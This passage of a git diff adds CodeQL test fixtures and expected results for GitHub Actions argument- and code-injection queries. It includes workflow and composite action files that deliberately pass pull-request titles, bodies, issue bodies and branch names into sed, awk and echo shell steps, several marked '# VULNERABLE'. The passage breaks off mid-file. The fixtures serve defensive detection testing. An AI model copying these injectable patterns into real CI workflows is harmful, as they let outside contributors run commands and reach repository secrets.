.github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref new file mode 100644 index 000000000000..e36c9c6f3e82 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-088/ArgumentInjectionCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected new file mode 100644 index 000000000000..12171d8c7f27 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected @@ -0,0 +1,23 @@ +edges +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | provenance | Config | +nodes +| .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | semmle.label | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | +| .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | semmle.label | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | +| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | semmle.label | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | +| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | semmle.label | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | +| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | semmle.label | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | +| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | semmle.label | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | +| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | semmle.label | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | +| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | +subpaths +#select diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref new file mode 100644 index 000000000000..afc26233870a --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-088/ArgumentInjectionMedium.ql diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml new file mode 100644 index 000000000000..ba7d3eec1af7 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml @@ -0,0 +1,7 @@ +name: 'Test' +description: 'Test' +runs: + using: 'composite' + steps: + - shell: bash + run: echo '${{ github.event.pull_request.body }}' diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action2/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action2/action.yml new file mode 100644 index 000000000000..20f8d227348d --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action2/action.yml @@ -0,0 +1,17 @@ +name: 'Hello World' +description: 'Greet someone and record the time' +inputs: + who-to-greet: # id of input + description: 'Who to greet' + required: true + default: 'World' +outputs: + time: # id of output + description: 'The time we greeted you' +runs: + using: 'docker' + steps: # this is actually invalid, used to test we correctly identify composite actions + - run: echo '${{ github.event.comment.body }}' + image: 'Dockerfile' + args: + - ${{ inputs.who-to-greet }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml new file mode 100644 index 000000000000..510ad86cbfa9 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml @@ -0,0 +1,9 @@ +name: 'Test' +description: 'Test' +runs: + using: 'composite' + steps: + - shell: bash + env: + FOO: ${{ secrets.FOO}} + run: echo '${{ github.event.pull_request.body }}' diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml new file mode 100644 index 000000000000..ba7d3eec1af7 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml @@ -0,0 +1,7 @@ +name: 'Test' +description: 'Test' +runs: + using: 'composite' + steps: + - shell: bash + run: echo '${{ github.event.pull_request.body }}' diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml new file mode 100644 index 000000000000..53a2e0c87e27 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml @@ -0,0 +1,34 @@ +name: 'Test' +description: 'Test' +inputs: + taint: + description: 'text' + required: true + default: 'Foo' +outputs: + result: + description: "result" + value: ${{ steps.step.outputs.result }} + result2: + description: "result" + value: ${{ steps.step2.outputs.result2 }} +runs: + using: 'composite' + steps: + - shell: bash + run: echo '${{ github.event.issue.body }}' + - name: Step + id: step + env: + FOO: ${{ inputs.taint }} + shell: bash + run: echo "result=$(echo $FOO)" >> $GITHUB_OUTPUT + - id: step2 + env: + FOO2: ${{ github.event.issue.body }} + shell: bash + run: echo "result2=$(echo $FOO2)" >> $GITHUB_OUTPUT + - name: Sink + id: sink + shell: bash + run: echo "${{ inputs.taint }}" diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml new file mode 100644 index 000000000000..0048a4ca31e1 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml @@ -0,0 +1,251 @@ +# Ultralytics Actions 🚀, AGPL-3.0 License https://ultralytics.com/license + +name: "Ultralytics Actions" +author: "Ultralytics" +description: "Optimize code and docs with official Ultralytics Actions for syntax, spelling, and link checks." +branding: + icon: "code" + color: "blue" +inputs: + token: + description: "GitHub token" + required: true + labels: + description: "Run issue and PR auto-labeling" + required: false + default: "false" + python: + description: "Run Python formatting" + required: false + default: "false" + markdown: + description: "Run Markdown formatting (deprecated in favor of prettier)" + required: false + default: "false" + prettier: + description: "Run Prettier formatting for JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML" + required: false + default: "false" + swift: + description: "Run Swift formatting" + required: false + default: "false" + spelling: + description: "Run Spelling checks" + required: false + default: "false" + links: + description: "Run Broken Links checks" + required: false + default: "false" + summary: + description: "Run PR Summary" + required: false + default: "false" + openai_api_key: + description: "OpenAI API Key" + required: false + openai_model: + description: "OpenAI Model" + required: false + default: "gpt-4o" + first_issue_response: + description: "Example response to a new issue" + required: false + first_pr_response: + description: "Example response to a new PR" + required: false + github_username: + description: "GitHub username for commits" + required: false + default: "UltralyticsAssistant" + github_email: + description: "GitHub email for commits" + required: false + default: "web@ultralytics.com" +runs: + using: "composite" + steps: + - uses: astral-sh/setup-uv@v3 + - name: Install Dependencies + # Note tomli required for codespell with pyproject.toml + # For debug: + # python -m pip install --upgrade pip wheel + # pip install -q git+https://github.com/ultralytics/actions@main codespell tomli + run: | + packages="ultralytics-actions" + if [ "${{ inputs.spelling }}" = "true" ]; then + packages="$packages codespell tomli" + fi + + # On macOS, don't use sudo as it can cause environment issues + if [ "$(uname)" = "Darwin" ]; then + pip install -q $packages + else + sudo env "PATH=$PATH" uv pip install --system $packages + fi + + ultralytics-actions-info + shell: bash + + # Checkout Repository ---------------------------------------------------------------------------------------------- + - name: Checkout Repository + if: github.event.action != 'closed' + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name || github.repository }} + token: ${{ inputs.token }} + ref: ${{ github.head_ref || github.ref }} + fetch-depth: 0 + + # PR Summary ------------------------------------------------------------------------------------------------------- + - name: PR Summary + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.summary == 'true' && github.event.action != 'synchronize' + env: + GITHUB_TOKEN: ${{ inputs.token }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-summarize-pr + shell: bash + continue-on-error: true + + # Python formatting ------------------------------------------------------------------------------------------------ + # Ignores the following Docs rules to match Google-style docstrings: + # D100: Missing docstring in public module + # D104: Missing docstring in public package + # D203: 1 blank line required before class docstring + # D205: 1 blank line required between summary line and description + # D212: Multi-line docstring summary should start at the first line + # D213: Multi-line docstring summary should start at the second line + # D401: First line of docstring should be in imperative mood + # D406: Section name should end with a newline + # D407: Missing dashed underline after section + # D413: Missing blank line after last section + # --target-version is Python 3.8 for --extend-select UP (pyupgrade) + - name: Run Python + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.python == 'true' && github.event.action != 'closed' + run: | + ruff format \ + --line-length 120 \ + . || true + ruff check \ + --fix \ + --unsafe-fixes \ + --extend-select I,D,UP \ + --target-version py38 \ + --ignore D100,D104,D203,D205,D212,D213,D401,D406,D407,D413 \ + . || true + docformatter \ + --wrap-summaries 120 \ + --wrap-descriptions 120 \ + --pre-summary-newline \ + --close-quotes-on-newline \ + --in-place \ + --recursive \ + . + shell: bash + continue-on-error: true + + # Prettier (JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML) ------------- + - name: Run Prettier + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + run: | + ultralytics-actions-update-markdown-code-blocks + npm install --global prettier + npx prettier --write "**/*.{js,jsx,ts,tsx,css,less,scss,json,yml,yaml,html,vue,svelte}" '!**/*lock.{json,yaml,yml}' '!**/*.lock' '!**/model.json' + # Handle Markdown separately + find . -name "*.md" ! -path "*/docs/*" -exec npx prettier --write {} + + if [ -d "./docs" ]; then + find ./docs -name "*.md" ! -path "*/reference/*" -exec npx prettier --tab-width 4 --write {} + + fi + shell: bash + continue-on-error: true + + # - name: Fix MkDocs reference section changes + # if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + # run: | + # from pathlib import Path + # for file in Path("./docs").rglob('*.md'): + # content = file.read_text() + # updated_content = content.replace(".\_","._") + # file.write_text(updated_content) + # shell: python + # continue-on-error: true + + # Swift formatting ------------------------------------------------------------------------------------------------- + - name: Run Swift Formatter + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.swift == 'true' && github.event.action != 'closed' + run: | + brew install swift-format + swift-format --in-place --recursive . + shell: bash + continue-on-error: true + + # Spelling --------------------------------------------------------------------------------------------------------- + - name: Run Codespell + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.spelling == 'true' && github.event.action != 'closed' + run: | + codespell \ + --write-changes \ + --ignore-words-list "crate,nd,ned,strack,dota,ane,segway,fo,gool,winn,commend,bloc,nam,afterall,skelton,goin" \ + --skip "*.pt,*.pth,*.torchscript,*.onnx,*.tflite,*.pb,*.bin,*.param,*.mlmodel,*.engine,*.npy,*.data*,*.csv,*pnnx*,*venv*,*translat*,*lock*,__pycache__*,*.ico,*.jpg,*.png,*.mp4,*.mov,/runs,/.git,./docs/??/*.md,./docs/mkdocs_??.yml" + shell: bash + continue-on-error: true + + # Autolabel Issues and PRs (run before commit changes in case commit fails) ---------------------------------------- + - name: Autolabel Issues and PRs + if: inputs.labels == 'true' && (github.event.action == 'opened' || github.event.action == 'created') + env: + GITHUB_TOKEN: ${{ inputs.token }} + FIRST_ISSUE_RESPONSE: ${{ inputs.first_issue_response }} + FIRST_PR_RESPONSE: ${{ inputs.first_pr_response }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-first-interaction + shell: bash + continue-on-error: true + + # Commit Changes --------------------------------------------------------------------------------------------------- + - name: Commit and Push Changes + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && github.event.action != 'closed' + run: | + git config --global user.name "${{ inputs.github_username }}" + git config --global user.email "${{ inputs.github_email }}" + git pull origin ${{ github.head_ref || github.ref }} + git add . + git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token + if ! git diff --staged --quiet; then + git commit -m "Auto-format by https://ultralytics.com/actions" + git push + else + echo "No changes to commit" + fi + shell: bash + continue-on-error: false + + # Broken links ----------------------------------------------------------------------------------------------------- + - name: Broken Link Checker + if: inputs.links == 'true' && github.event.action != 'closed' + uses: lycheeverse/lychee-action@v2.0.2 + with: + # Check all markdown and html files in repo. Ignores the following status codes to reduce false positives: + # - 403(OpenVINO, "forbidden") + # - 429(Instagram, "too many requests") + # - 500(Zenodo, "cached") + # - 502(Zenodo, "bad gateway") + # - 999(LinkedIn, "unknown status code") + args: | + --scheme https + --timeout 60 + --insecure + --accept 403,429,500,502,999 + --exclude-all-private + --exclude "https?://(www\.)?(github\.com|linkedin\.com|twitter\.com|instagram\.com|kaggle\.com|fonts\.gstatic\.com|url\.com)" + "./**/*.md" + "./**/*.html" + token: ${{ inputs.token }} + output: ../lychee/results.md + fail: true + continue-on-error: false diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml new file mode 100644 index 000000000000..8bffcdc4020e --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml @@ -0,0 +1,252 @@ +# Ultralytics Actions 🚀, AGPL-3.0 License https://ultralytics.com/license + +name: "Ultralytics Actions" +author: "Ultralytics" +description: "Optimize code and docs with official Ultralytics Actions for syntax, spelling, and link checks." +branding: + icon: "code" + color: "blue" +inputs: + token: + description: "GitHub token" + required: true + labels: + description: "Run issue and PR auto-labeling" + required: false + default: "false" + python: + description: "Run Python formatting" + required: false + default: "false" + markdown: + description: "Run Markdown formatting (deprecated in favor of prettier)" + required: false + default: "false" + prettier: + description: "Run Prettier formatting for JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML" + required: false + default: "false" + swift: + description: "Run Swift formatting" + required: false + default: "false" + spelling: + description: "Run Spelling checks" + required: false + default: "false" + links: + description: "Run Broken Links checks" + required: false + default: "false" + summary: + description: "Run PR Summary" + required: false + default: "false" + openai_api_key: + description: "OpenAI API Key" + required: false + openai_model: + description: "OpenAI Model" + required: false + default: "gpt-4o" + first_issue_response: + description: "Example response to a new issue" + required: false + first_pr_response: + description: "Example response to a new PR" + required: false + github_username: + description: "GitHub username for commits" + required: false + default: "UltralyticsAssistant" + github_email: + description: "GitHub email for commits" + required: false + default: "web@ultralytics.com" +runs: + using: "composite" + steps: + - uses: astral-sh/setup-uv@v3 + - name: Install Dependencies + # Note tomli required for codespell with pyproject.toml + # For debug: + # python -m pip install --upgrade pip wheel + # pip install -q git+https://github.com/ultralytics/actions@main codespell tomli + run: | + packages="ultralytics-actions" + if [ "${{ inputs.spelling }}" = "true" ]; then + packages="$packages codespell tomli" + fi + + # On macOS, don't use sudo as it can cause environment issues + if [ "$(uname)" = "Darwin" ]; then + pip install -q $packages + else + sudo env "PATH=$PATH" uv pip install --system $packages + fi + + ultralytics-actions-info + shell: bash + + # Checkout Repository ---------------------------------------------------------------------------------------------- + - name: Checkout Repository + if: github.event.action != 'closed' + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name || github.repository }} + token: ${{ inputs.token }} + ref: ${{ github.head_ref || github.ref }} + fetch-depth: 0 + + # PR Summary ------------------------------------------------------------------------------------------------------- + - name: PR Summary + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.summary == 'true' && github.event.action != 'synchronize' + env: + GITHUB_TOKEN: ${{ inputs.token }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-summarize-pr + shell: bash + continue-on-error: true + + # Python formatting ------------------------------------------------------------------------------------------------ + # Ignores the following Docs rules to match Google-style docstrings: + # D100: Missing docstring in public module + # D104: Missing docstring in public package + # D203: 1 blank line required before class docstring + # D205: 1 blank line required between summary line and description + # D212: Multi-line docstring summary should start at the first line + # D213: Multi-line docstring summary should start at the second line + # D401: First line of docstring should be in imperative mood + # D406: Section name should end with a newline + # D407: Missing dashed underline after section + # D413: Missing blank line after last section + # --target-version is Python 3.8 for --extend-select UP (pyupgrade) + - name: Run Python + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.python == 'true' && github.event.action != 'closed' + run: | + ruff format \ + --line-length 120 \ + . || true + ruff check \ + --fix \ + --unsafe-fixes \ + --extend-select I,D,UP \ + --target-version py38 \ + --ignore D100,D104,D203,D205,D212,D213,D401,D406,D407,D413 \ + . || true + docformatter \ + --wrap-summaries 120 \ + --wrap-descriptions 120 \ + --pre-summary-newline \ + --close-quotes-on-newline \ + --in-place \ + --recursive \ + . + shell: bash + continue-on-error: true + + # Prettier (JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML) ------------- + - name: Run Prettier + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + run: | + ultralytics-actions-update-markdown-code-blocks + npm install --global prettier + npx prettier --write "**/*.{js,jsx,ts,tsx,css,less,scss,json,yml,yaml,html,vue,svelte}" '!**/*lock.{json,yaml,yml}' '!**/*.lock' '!**/model.json' + # Handle Markdown separately + find . -name "*.md" ! -path "*/docs/*" -exec npx prettier --write {} + + if [ -d "./docs" ]; then + find ./docs -name "*.md" ! -path "*/reference/*" -exec npx prettier --tab-width 4 --write {} + + fi + shell: bash + continue-on-error: true + + # - name: Fix MkDocs reference section changes + # if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + # run: | + # from pathlib import Path + # for file in Path("./docs").rglob('*.md'): + # content = file.read_text() + # updated_content = content.replace(".\_","._") + # file.write_text(updated_content) + # shell: python + # continue-on-error: true + + # Swift formatting ------------------------------------------------------------------------------------------------- + - name: Run Swift Formatter + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.swift == 'true' && github.event.action != 'closed' + run: | + brew install swift-format + swift-format --in-place --recursive . + shell: bash + continue-on-error: true + + # Spelling --------------------------------------------------------------------------------------------------------- + - name: Run Codespell + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.spelling == 'true' && github.event.action != 'closed' + run: | + codespell \ + --write-changes \ + --ignore-words-list "crate,nd,ned,strack,dota,ane,segway,fo,gool,winn,commend,bloc,nam,afterall,skelton,goin" \ + --skip "*.pt,*.pth,*.torchscript,*.onnx,*.tflite,*.pb,*.bin,*.param,*.mlmodel,*.engine,*.npy,*.data*,*.csv,*pnnx*,*venv*,*translat*,*lock*,__pycache__*,*.ico,*.jpg,*.png,*.mp4,*.mov,/runs,/.git,./docs/??/*.md,./docs/mkdocs_??.yml" + shell: bash + continue-on-error: true + + # Autolabel Issues and PRs (run before commit changes in case commit fails) ---------------------------------------- + - name: Autolabel Issues and PRs + if: inputs.labels == 'true' && (github.event.action == 'opened' || github.event.action == 'created') + env: + GITHUB_TOKEN: ${{ inputs.token }} + FIRST_ISSUE_RESPONSE: ${{ inputs.first_issue_response }} + FIRST_PR_RESPONSE: ${{ inputs.first_pr_response }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-first-interaction + shell: bash + continue-on-error: true + + # Commit Changes --------------------------------------------------------------------------------------------------- + - name: Commit and Push Changes + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && github.event.action != 'closed' + run: | + git config --global user.name "${{ inputs.github_username }}" + git config --global user.email "${{ inputs.github_email }}" + # this action is not called in the test + git pull origin ${{ github.head_ref || github.ref }} + git add . + git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token + if ! git diff --staged --quiet; then + git commit -m "Auto-format by https://ultralytics.com/actions" + git push + else + echo "No changes to commit" + fi + shell: bash + continue-on-error: false + + # Broken links ----------------------------------------------------------------------------------------------------- + - name: Broken Link Checker + if: inputs.links == 'true' && github.event.action != 'closed' + uses: lycheeverse/lychee-action@v2.0.2 + with: + # Check all markdown and html files in repo. Ignores the following status codes to reduce false positives: + # - 403(OpenVINO, "forbidden") + # - 429(Instagram, "too many requests") + # - 500(Zenodo, "cached") + # - 502(Zenodo, "bad gateway") + # - 999(LinkedIn, "unknown status code") + args: | + --scheme https + --timeout 60 + --insecure + --accept 403,429,500,502,999 + --exclude-all-private + --exclude "https?://(www\.)?(github\.com|linkedin\.com|twitter\.com|instagram\.com|kaggle\.com|fonts\.gstatic\.com|url\.com)" + "./**/*.md" + "./**/*.html" + token: ${{ inputs.token }} + output: ../lychee/results.md + fail: true + continue-on-error: false diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml new file mode 100644 index 000000000000..398c0ee6a6e1 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml @@ -0,0 +1,47 @@ +name: Clone repository +description: Clone repository +inputs: + title: + description: Title + required: true + forked-pr: + description: Whether the event is operating from a forked PR + required: true + fetch-depth: + description: Fetch depth for actions/checkout + default: "1" +outputs: + result: + description: "result" + value: ${{ steps.out.outputs.replaced }} + +runs: + using: composite + steps: + - shell: bash + run: echo "${{ inputs.title }}" + - uses: frabert/replace-string-action@v2.5 + id: out + with: + pattern: "\"" + string: ${{ inputs.title }} + replace-with: 'foo' + flags: g + - id: out2 + env: + FOO: ${{ inputs.title }} + shell: bash + run: echo "result=$(echo $FOO)" >> $GITHUB_OUTPUT + - name: Clone branch + if: "!fromJSON(inputs.forked-pr)" + uses: actions/checkout@v3 + with: + fetch-depth: ${{ inputs.fetch-depth }} + - name: Clone forked PR + if: fromJSON(inputs.forked-pr) + uses: actions/checkout@v3 + with: + ref: refs/pull/${{ github.event.number }}/merge + fetch-depth: ${{ inputs.fetch-depth }} + + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml new file mode 100644 index 000000000000..a8019fbbf145 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml @@ -0,0 +1,258 @@ +# Ultralytics Actions 🚀, AGPL-3.0 License https://ultralytics.com/license + +name: "Ultralytics Actions" +author: "Ultralytics" +description: "Optimize code and docs with official Ultralytics Actions for syntax, spelling, and link checks." +branding: + icon: "code" + color: "blue" +inputs: + token: + description: "GitHub token" + required: true + labels: + description: "Run issue and PR 